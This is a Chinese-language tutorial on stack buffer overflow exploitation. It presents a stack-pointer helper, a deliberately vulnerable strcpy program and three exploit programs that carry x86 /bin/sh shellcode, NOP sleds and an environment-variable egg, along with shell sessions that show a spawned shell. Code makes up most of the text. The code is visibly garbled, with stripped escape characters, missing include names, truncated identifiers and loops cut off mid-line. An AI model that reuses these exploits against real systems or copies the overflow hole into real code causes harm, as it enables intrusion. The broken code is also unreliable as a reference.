寻找地址 \r\n当我们尝试去溢出一个程序的缓冲区的时候,这个程序要寻找这个缓冲区的地址。这个问题的答案是:对每个程序来说,堆栈都是在同一个地址上开始的。因此,只要知道了这个堆栈的地址是在哪里的,我们就可以猜出这个缓冲区的地址了。 \r\n下面这个程序会告诉我们这个程序的的堆栈指针: \r\nlt;++> buffer/getsp.c \r\nunsigned long get_sp(void){ \r\n__asm__(\"movl %esp, %eax); \r\n} \r\nvoid main(){ \r\nfprintf(stdout,\"0x%xn\",get_sp()); \r\n} \r\nlt;--> end of getsp.c试一下下面这个例子 \r\nlt;++> buffer/hole.c \r\nvoid main(int argc,char **argv[]){ \r\nchar buffer[512]; \r\nif (argc > 1) /* otherwise we crash our little program */ \r\ntrcpy(buffer,argv[1]); \r\n} \r\nlt;--> end of hole.c \r\nlt;++> buffer/exploit1.c \r\n#include \r\n#define DEFAULT_OFFSET 0 \r\n#define DEFAULT_BUFFER_SIZE 512 \r\nchar shellcode[] = \r\n\"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b\" \r\n\"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd\" \r\n\"x80xe8xdcxffxffxff/bin/sh\"; \r\nunsigned long get_sp(void) { \r\n__asm__(\"movl %esp,%eax\"); \r\n} \r\nvoid main(int argc, char *argv[]) \r\n{ \r\nchar *buff, *ptr; \r\nlong *addr_ptr, addr; \r\nint offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; \r\nint i; \r\nif (argc > 1) bsize = atoi(argv[1]); \r\nif (argc > 2) offset = atoi(argv[2]); \r\nif (!(buff = malloc(bsize))) { \r\nrintf(\"Can\'t allocate memory.n\"); \r\nexit(0); \r\n} \r\naddr = get_sp() - offset; \r\nrintf(\"Using address: 0x%xn\", addr); \r\ntr = buff; \r\naddr_ptr = (long *) ptr; \r\nfor (i = 0; i end of exploit1.c\r\n现在我们可以猜出offset (bufferaddress = stackpointer + offset). \r\n[hosts]$ exploit1 600 \r\nUsing address: 0xbffff6c3 \r\n[hosts]$ ./hole $BUF \r\n[hosts]$ exploit1 600 100 \r\nUsing address: 0xbffffce6 \r\n[hosts]$ ./hole $BUF \r\negmentation fault \r\netc. \r\netc. 
\r\n就象你所知道的那样,这个过程几乎是不可能发生的,这样,我们不得不去猜出更精确的溢出地址。为了增加我们的机会,我们可以在我们的缓冲溢出的shellcode前加上 NOP(空操作)指令。因为我们没有必要去猜出它精确的溢出地址来。而NOP指令用来延迟执行的。如果这个被覆写的返回地址指针在NOP串中,我们的代码就可以在下面一步执行了。 \r\n存储器的内容应该是这样的: \r\nFFFFF NNNNNNNNNNNSSSSSSSSSSSSSSAAAAAAAAFFFFFFFFF \r\nN = NOP \r\nS = shellcode \r\nA = address pointing to the shellcode \r\nF = other data \r\n我们把原先的代码改了一下 \r\nlt;++> buffer/exploit2.c \r\n#include \r\n#define DEFAULT_OFFSET 0 \r\n#define DEFAULT_BUFFER_SIZE 512 \r\n#define NOP 0x90 \r\nchar shellcode[] = \r\n\"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b\" \r\n\"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd\" \r\n\"x80xe8xdcxffxffxff/bin/sh\"; \r\nunsigned long get_sp(void) { \r\n__asm__(\"movl %esp,%eax\"); \r\n} \r\nvoid main(int argc, char *argv[]) \r\n{ \r\nchar *buff, *ptr; \r\nlong *addr_ptr, addr; \r\nint offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; \r\nint i; \r\nif (argc > 1) bsize = atoi(argv[1]); \r\nif (argc > 2) offset = atoi(argv[2]); \r\nif (!(buff = malloc(bsize))) { \r\nrintf(\"Can\'t allocate memory.n\"); \r\nexit(0); \r\n} \r\naddr = get_sp() - offset; \r\nrintf(\"Using address: 0x%xn\", addr); \r\ntr = buff; \r\naddr_ptr = (long *) ptr; \r\nfor (i = 0; i end of exploit2.c \r\n[hosts]$ exploit2 600 \r\nUsing address: 0xbffff6c3 \r\n[hosts]$ ./hole $BUF \r\negmentation fault \r\n[hosts]$ exploit2 600 100 \r\nUsing address: 0xbffffce6 \r\n[hosts]$ ./hole $BUF \r\n#exit \r\n[hosts]$为了更完善我们的代码,我们把这些shellcode放到环境变量里去。然后我们就可以用这个变量的地址来溢出缓冲器了。这方法可以增加我们的机会。用setenv()函数来调用,并把shellcode送到环境变量中去。 \r\nlt;++> buffer/exploit3.c \r\n#include \r\n#define DEFAULT_OFFSET 0 \r\n#define DEFAULT_BUFFER_SIZE 512 \r\n#define DEFAULT_EGG_SIZE 2048 \r\n#define NOP 0x90 \r\nchar shellcode[] = \r\n\"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b\" \r\n\"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd\" \r\n\"x80xe8xdcxffxffxff/bin/sh\"; \r\nunsigned long get_esp(void) { \r\n__asm__(\"movl %esp,%eax\"); \r\n} \r\nvoid main(int argc, char *argv[]) \r\n{ \r\nchar *buff, 
*ptr, *egg; \r\nlong *addr_ptr, addr; \r\nint offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; \r\nint i, eggsize=DEFAULT_EGG_SIZE; \r\nif (argc > 1) bsize = atoi(argv[1]); \r\nif (argc > 2) offset = atoi(argv[2]); \r\nif (argc > 3) eggsize = atoi(argv[3]); \r\nif (!(buff = malloc(bsize))) { \r\nrintf(\"Can\'t allocate memory.n\"); \r\nexit(0); \r\n} \r\nif (!(egg = malloc(eggsize))) { \r\nrintf(\"Can\'t allocate memory.n\"); \r\nexit(0); \r\n} \r\naddr = get_esp() - offset; \r\nrintf(\"Using address: 0x%xn\", addr); \r\ntr = buff; \r\naddr_ptr = (long *) ptr; \r\nfor (i = 0; i |